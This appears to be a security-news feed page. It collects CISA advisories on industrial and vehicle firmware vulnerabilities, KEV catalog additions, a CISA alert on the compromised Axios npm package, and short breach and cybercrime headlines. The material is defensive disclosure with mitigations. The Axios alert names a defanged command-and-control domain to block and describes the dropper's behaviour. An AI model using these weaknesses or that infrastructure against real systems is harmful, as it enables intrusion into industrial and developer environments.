Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-801704 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-801704 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to pair via Bluetooth with a motorcycle, gaining unauthorized access to all Bluetooth functions, including changing the firmware. The following versions of Zero Motorcycles Firmware are affected: Zero Motorcycles firmware <=44 (CVE-2026-1354) CVSS Vendor Equipment Vulnerabilities v3 6.4 Zero Motorcycles Zero Motorcycles Firmware Key Exchange without Entity Authentication Background Critical Infrastructure Sectors: Transportation Systems Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-1354 Zero Motorcycles firmware versions 44 and prior enable an attacker to forcibly pair a device with the motorcycle via Bluetooth. Once paired, an attacker can utilize over-the-air firmware updating functionality to potentially upload malicious firmware to the motorcycle. The motorcycle must first be in Bluetooth pairing mode, and the attacker must be in proximity of the vehicle and understand the full pairing process, to be able to pair their device with the vehicle. The attacker's device must remain paired with and in proximity of the motorcycle for the entire duration of the firmware update. View CVE Details Affected Products Zero Motorcycles Firmware Vendor: Zero Motorcycles Product Version: Zero Motorcycles Zero Motorcycles firmware: <=44 Product Status: known_affected Remediations Mitigation Zero Motorcycles has investigated this report and cautions users to pair their mobile device to their vehicle in a safe location where they can be sure no one else will try to pair at the same time. Once initiated, complete the full pairing process and confirm it is successful. Store physical keys in a secure location and do not leave the bike unattended with the key in the "ON" position. Zero Motorcycles plans to address this issue in a firmware update scheduled for release in May 2026. Update the firmware to the latest available version. Relevant CWE: CWE-322 Key Exchange without Entity Authentication Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.4 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H Acknowledgments Persephone Karnstein of Bureau Veritas Cybersecurity North America reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability has a high attack complexity. Revision History Initial Release Date: 2026-04-21 Date Revision Summary 2026-04-21 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary SINEC NMS before V4.0 SP3 contains an Authorization Bypass vulnerability that could allow an attacker to bypass authorization checks, leading to the ability to reset the password of any arbitrary user account. Siemens has released a new version for SINEC NMS and recommends to update to the latest version. The following versions of Siemens SINEC NMS are affected: SINEC NMS CVSS Vendor Equipment Vulnerabilities v3 8.8 Siemens Siemens SINEC NMS Authorization Bypass Through User-Controlled Key Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-25654 Affected products do not properly validate user authorization when processing password reset requests. This could allow an authenticated remote attacker to bypass authorization checks, leading to the ability to reset the password of any arbitrary user account. View CVE Details Affected Products Siemens SINEC NMS Vendor: Siemens Product Version: SINEC NMS Product Status: known_affected Remediations Mitigation Limit network access to trusted users and systems only Vendor fix Update to V4.0 SP3 or later version https://support.industry.siemens.com/cs/ww/en/view/110000760/ Relevant CWE: CWE-639 Authorization Bypass Through User-Controlled Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-605717 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-605717 advisory Legal Notice and Terms of Use

View CSAF Summary Industrial Edge Management contains an authorization bypass vulnerability that could be exploited by an unauthenticated remote attacker to circumvent authentication and to access connected Industrial Edge Devices through the remote connection feature. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Industrial Edge Management are affected: Industrial Edge Management Pro V1 vers:intdot/>=1.7.6|<1.15.17 (CVE-2026-33892) Industrial Edge Management Pro V2 vers:intdot/>=2.0.0|<2.1.1 (CVE-2026-33892) Industrial Edge Management Virtual vers:intdot/>=2.2.0|<2.8.0 (CVE-2026-33892) CVSS Vendor Equipment Vulnerabilities v3 7.1 Siemens Siemens Industrial Edge Management Authentication Bypass by Primary Weakness Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-33892 Affected management systems do not properly enforce user authentication on remote connections to devices. This could facilitate an unauthenticated remote attacker to circumvent authentication and impersonate a legitimate user. Successful exploitation requires that the attacker has identified the header and port used for remote connections to devices and that the remote connection feature is enabled for the device. Exploitation allows the attacker to tunnel to the device. Security features on this device itself (e.g. app specific authentication) are not affected. View CVE Details Affected Products Siemens Industrial Edge Management Vendor: Siemens Product Version: Industrial Edge Management Pro V1, Industrial Edge Management Pro V2, Industrial Edge Management Virtual Product Status: known_affected Remediations Mitigation Ensure network access to affected products is limited to trusted parties only Vendor fix Update to V1.15.17 or later version https://iehub.eu1.edge.siemens.cloud/ Vendor fix Update to V2.1.1 or later version https://iehub.eu1.edge.siemens.cloud/ Vendor fix Update to V2.8.0 or later version https://iehub.eu1.edge.siemens.cloud/ Relevant CWE: CWE-305 Authentication Bypass by Primary Weakness Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-609469 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-609469 advisory Legal Notice and Terms of Use

View CSAF Summary RUGGEDCOM CROSSBOW Station Access Controller (SAC) contains a vulnerability that could allow an attacker to achieve arbitrary code execution and to create a denial of service condition. Siemens has released a new version for RUGGEDCOM CROSSBOW Station Access Controller (SAC) and recommends to update to the latest version. The following versions of Siemens RUGGEDCOM CROSSBOW Station Access Controller (SAC) are affected: RUGGEDCOM CROSSBOW Station Access Controller (SAC) vers:intdot/<5.8 (CVE-2025-6965) CVSS Vendor Equipment Vulnerabilities v3 7.7 Siemens Siemens RUGGEDCOM CROSSBOW Station Access Controller (SAC) Numeric Truncation Error Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-6965 There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. We recommend upgrading to version 3.50.2 or above. View CVE Details Affected Products Siemens RUGGEDCOM CROSSBOW Station Access Controller (SAC) Vendor: Siemens Product Version: RUGGEDCOM CROSSBOW Station Access Controller (SAC) Product Status: known_affected Remediations Vendor fix Update to V5.8 or later version https://support.industry.siemens.com/cs/ww/en/view/110000841/ Relevant CWE: CWE-197 Numeric Truncation Error Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.7 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-225816 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-225816 advisory Legal Notice and Terms of Use

Stolen OAuth tokens, which are at the root of these breaches, "are the new attack surface, the new lateral movement," a researcher notes.

The OT devices that translate machine talk into Internet-speak are riddled with vulnerabilities and more frequently targeted for attacks, researchers say.

The DDoS attack against Mastodon's flagship server comes less than a week after Bluesky was targeted with junk web traffic.

Bitcoin bulls avoided a correction as US markets opened, but analysis warned that Strategy was responsible for much of the latest BTC price strength.

Microsoft is warning of threat actors increasingly abusing external Microsoft Teams collaboration and relying on legitimate tools for access and lateral movement on enterprise networks. [...]

Vercel blamed its breach on an earlier hack at Context AI, which allowed hackers to hijack a Vercel employee's account to steal customer data.

Strangers can infer limited info about you without knowing or messaging you, which could theoretically aid certain kinds of malicious activity.

Backups protect data, but don't keep your business running during downtime. Datto shows why BCDR is essential to keep operations running during ransomware and outages. [...]

A British man, believed to be the leader of the Scattered Spider cybercrime collective, has pleaded guilty in the United States to charges of wire fraud and aggravated identity theft. [...]

CISA has added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.  CVE-2023-27351 PaperCut NG/MF Improper Authentication Vulnerability CVE-2024-27199 JetBrains TeamCity Relative Path Traversal Vulnerability CVE-2025-2749 Kentico Xperience Path Traversal Vulnerability CVE-2025-32975 Quest KACE Systems Management Appliance (SMA) Improper Authentication Vulnerability CVE-2025-48700 Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability CVE-2026-20122 Cisco Catalyst SD-WAN Manager Incorrect Use of Privileged APIs Vulnerability CVE-2026-20128 Cisco Catalyst SD-WAN Manager Storing Passwords in a Recoverable Format Vulnerability CVE-2026-20133 Cisco Catalyst SD-WAN Manager Exposure of Sensitive Information to an Unauthorized Actor Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.  Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this alert to provide guidance in response to the software supply chain compromise of the Axios node package manager (npm).1 Axios is an HTTP client for JavaScript that developers commonly use in Node.js and browser environments.  On March 31, 2026, two npm packages for versions axios@1.14.1 and axios@0.30.4 of Axios npm injected the malicious dependency plain-crypto-js@4.2.1 that downloads multi-stage payloads from cyber threat actor infrastructure, including a remote access trojan.2 CISA urges organizations to implement the following recommendations to detect and remediate a potential compromise:  Monitor and review code repositories, continuous integration/continuous delivery (CI/CD) pipelines, and developer machines that ran npm install or npm update with the compromised Axios version. Search for cached versions of affected dependencies in artifact repositories and dependency management tools. Pin npm package dependency versions to known safe releases. If compromised dependencies are identified, revert the environment to a known safe state.  Downgrade to axios@1.14.0 or axios@0.30.3 and delete node_modules/plain-crypto-js/. Rotate/revoke credentials that may have been exposed on affected systems or pipelines (e.g., version control system [VCS] tokens, CI/CD secrets, cloud keys, npm tokens, and Secure Shell [SSH] keys). For ephemeral CI jobs, rotate all secrets injected into the compromised run. Monitor for unexpected child processes and anomalous network behavior, specifically during npm install or npm update. Block and monitor outbound connections to Sfrclak[.]com domains. Conduct continuous indicator searches and endpoint detection and response (EDR) hunts to confirm no indicators of compromise (IOCs) remain; ensure no further egress to the command and control (C2). In addition, CISA recommends organizations using Axios npm: Mandate phishing-resistant multifactor authentication (MFA) on all developer accounts, especially for critical platforms. Set ignore-scripts=true in the .npmrc configuration file, which prevents potentially malicious scripts from executing during npm install packages. Set min-release-age=7 in the .npmrc configuration file to only install packages that have been published for at least seven days, which helps avoid installation of packages that may not be completely vetted or are potentially malicious. Establish and maintain a baseline of normal execution behavior for tools that use Axios. Alert when a dependency behaves differently (e.g., building containers, enabling shells, executing commands) and trace outbound network activity for anomalous connections. See the following resources for additional guidance on this compromise:  GitHub: Post Mortem: axios npm supply chain compromise #10636 Microsoft: Mitigating the Axios npm supply chain compromise StepSecurity: axios Compromised on npm - Malicious Versions Drop Remote Access Trojan npm Docs: Securing your code Socket: Supply Chain Attack on Axios Pulls Malicious Dependency from npm Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. Notes 1 “Post Mortem: axios npm supply chain compromise,” axios GitHub, Issue #10636, March 31, 2026, https://github.com/axios/axios/issues/10636. 2 “Mitigating the Axios npm supply chain compromise,” Microsoft Threat Intelligence and Microsoft Defender Security Research Team, April 1, 2026, https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise/.

LayerZero said that Kelp’s DVN setup allowed the $290 million exploit, as investors questioned which protocol would step up to cover the shortfall.

Vercel has confirmed it was compromised after a member of a hacking forum put the company’s information up for sale for $2 million.

EasyDNS CEO Mark Jeftovic said the social engineering attack was highly sophisticated and the company is conducting further investigation to determine how the breach occurred.

Bitcoin briefly crashed below $74,000 on Sunday as Iran threatened retaliation for a US military seizure of an Iranian cargo ship.

The Aave token fell nearly 20% to $89.5 in just over 24 hours as users withdrew billions of dollars from the lending protocol.

A prohibition on yield-bearing stablecoins and robust payments infrastructure in the US means stablecoins will not eat into banks' market share.

Cloud development platform Vercel has disclosed a security incident after threat actors claimed to have breached its systems and are attempting to sell stolen data. [...]

The contagion from the Kelp exploit could have been contained, but at the cost of capital efficiency, according to the founder of Curve Finance.

The attack triggered a "cross-protocol contagion" that has hit at least nine crypto protocols, blockchain security firm Cyvers said.

Proof-of-concept exploit code has been published for a critical remote code execution flaw in protobuf.js, a widely used JavaScript implementation of Google's Protocol Buffers. [...]

NAKIVO Inc. announced the general availability of NAKIVO Backup & Replication v11.2, focused on fast, reliable, and proactive data protection. [...]

Nicholas Moore hacked into three U.S. government networks using stolen credentials, and then bragged about it and posted victims' personal data on Instagram under the handle @ihackedthegovernment.

The Payouts King ransomware is using the QEMU emulator as a reverse SSH backdoor to run hidden virtual machines on compromised systems and bypass endpoint security. [...]

In embracing device code phishing, attackers trick victims into handing over account access by using a service's legitimate new-device login flow.

A security researcher published details of three security vulnerabilities in Windows Defender, and the code used to exploit them. Now, hackers are taking advantage of the vulnerabilities in real-life attacks, according to a cybersecurity firm.

Kyrgyzstan-based cryptocurrency exchange Grinex has suspended its operations after suffering a $13.7 million hack attributed to Western intelligence agencies. [...]

AI's danger isn't that it's creating new bugs, it's that it's amplifying old ones.

In cybercrime markets, trust isn't assumed, it's verified. Flare reveals how underground guides teach actors to evaluate carding shops based on data quality, reputation, and survivability. [...]

Cyberattacks are evolving faster than many MSP and corporate defenses can keep up, with phishing driving much of today's cybercrime. Join our upcoming webinar to learn how to combine security and recovery strategies to reduce risk and maintain business continuity. [...]

CISA warned that attackers are now exploiting a high-severity Apache ActiveMQ vulnerability, which was patched earlier this month after going undetected for 13 years. [...]

23-year-old Kamerin Stokes of Memphis, Tennessee, was sentenced to 30 months in prison for selling access to tens of thousands of hacked DraftKings accounts. [...]

Threat actors are exploiting three recently disclosed Windows security vulnerabilities in attacks aimed at gaining SYSTEM or elevated administrator permissions. [...]

The National Institute of Standards and Technology carved a new path for vulnerability remediation by changing the way it prioritizes software flaws.

Sapphire Sleet uses fake job offers and phony Zoom updates to deliver ClickFix attacks that steal credentials and sensitive data from Macs.

Threat actors know how to bypass security systems outside of traditional IT environments. Implementing 2FA could provide a needed extra security barrier in the physical world.

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

AI agents don’t fit traditional threat models. They act like users, services, and data pipelines at once. Learn why STRIDE alone falls short, how MAESTRO fills the gaps, and why modern AI systems must be treated as insider threats.

AI agents don’t fit traditional threat models. They act like users, services, and data pipelines at once. Learn why STRIDE alone falls short, how MAESTRO fills the gaps, and why modern AI systems must be treated as insider threats.

View CSAF Summary Successful exploitation of this vulnerability could allow an unauthenticated attacker to modify simulation parameters, training configuration and training records. The following versions of AVEVA Pipeline Simulation are affected: Pipeline Simulation <=2025_SP1_build_7.1.9497.6351 CVSS Vendor Equipment Vulnerabilities v3 9.1 AVEVA AVEVA Pipeline Simulation Missing Authorization Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: United Kingdom Vulnerabilities Expand All + CVE-2026-5387 The vulnerability, if exploited, could allow an unauthenticated miscreant to perform operations intended only for Simulator Instructor or Simulator Developer (Administrator) roles, resulting in privilege escalation with potential for modification of simulation parameters, training configuration, and training records. View CVE Details Affected Products AVEVA Pipeline Simulation Vendor: AVEVA Product Version: AVEVA Pipeline Simulation: <=2025_SP1_build_7.1.9497.6351 Product Status: known_affected Remediations Vendor fix All affected versions can be fixed by upgrading to AVEVA Pipeline Simulation 2025 SP1 P01 (build 7.1.9580.8513) or higher. (https://softwaresupportsp.aveva.com/en-US/downloads/products/details/57b79fdb-7b5f-4125-8a44-833b6b5c6d6f) https://softwaresupportsp.aveva.com/en-US/downloads/products/details/57b79fdb-7b5f-4125-8a44-833b6b5c6d6f Mitigation For more information, please see AVEVA's security bulletin AVEVA-2026-004 (https://www.aveva.com/content/dam/aveva/documents/support/cyber-security-updates/SecurityBulletin_AVEVA-2026-004.pdf). https://www.aveva.com/content/dam/aveva/documents/support/cyber-security-updates/SecurityBulletin_AVEVA-2026-004.pdf Vendor fix Restrict Network Access: Implement host-based and/or network firewall controls on all nodes hosting the Pipeline Simulation Server API to ensure that only trusted Pipeline Simulation client systems are permitted to establish connections. Mitigation Enforce Secure Communication: Enable TLS for all API communications and ensure that server certificates are properly managed and protected to reduce the risk of manipulator-in-the-middle(MitM) attacks and tampering with data in transit. Relevant CWE: CWE-862 Missing Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Acknowledgments AVEVA reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-16 Date Revision Summary 2026-04-16 1 Initial Republication of AVEVA-2026-004 Legal Notice and Terms of Use

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-34197 Apache ActiveMQ Improper Input Validation Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to systems and services. The following versions of Horner Automation Cscape and XL4, XL7 PLC are affected: Cscape v10.0 XL7 PLC v15.60 XL4 PLC v16.32.0 CVSS Vendor Equipment Vulnerabilities v3 9.1 Horner Automation Horner Automation Cscape and XL4, XL7 PLC Weak Password Requirements Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-6284 An attacker with network access to the PLC is able to brute force discover passwords to gain unauthorized access to systems and services. The limited password complexity and no password input limiters makes brute force password enumeration possible. View CVE Details Affected Products Horner Automation Cscape and XL4, XL7 PLC Vendor: Horner Automation Product Version: Horner Automation Cscape: v10.0, Horner Automation XL7 PLC: v15.60, Horner Automation XL4 PLC: v16.32.0 Product Status: known_affected Remediations Vendor fix Horner Automation recommends users update to Cscape v10.2 SP2 or later. Horner Automation has also released the latest firmware for both XL4 and XL7 PLCs. Horner recommends users update to the latest version of the firmware. https://hornerautomation.com/cscape-software-free/cscape-software/. https://hornerautomation.com/cscape-software-free/cscape-software/ Mitigation For more information, see Horner Automation's release notes. Relevant CWE: CWE-521 Weak Password Requirements Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Acknowledgments An anonymous researcher reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have 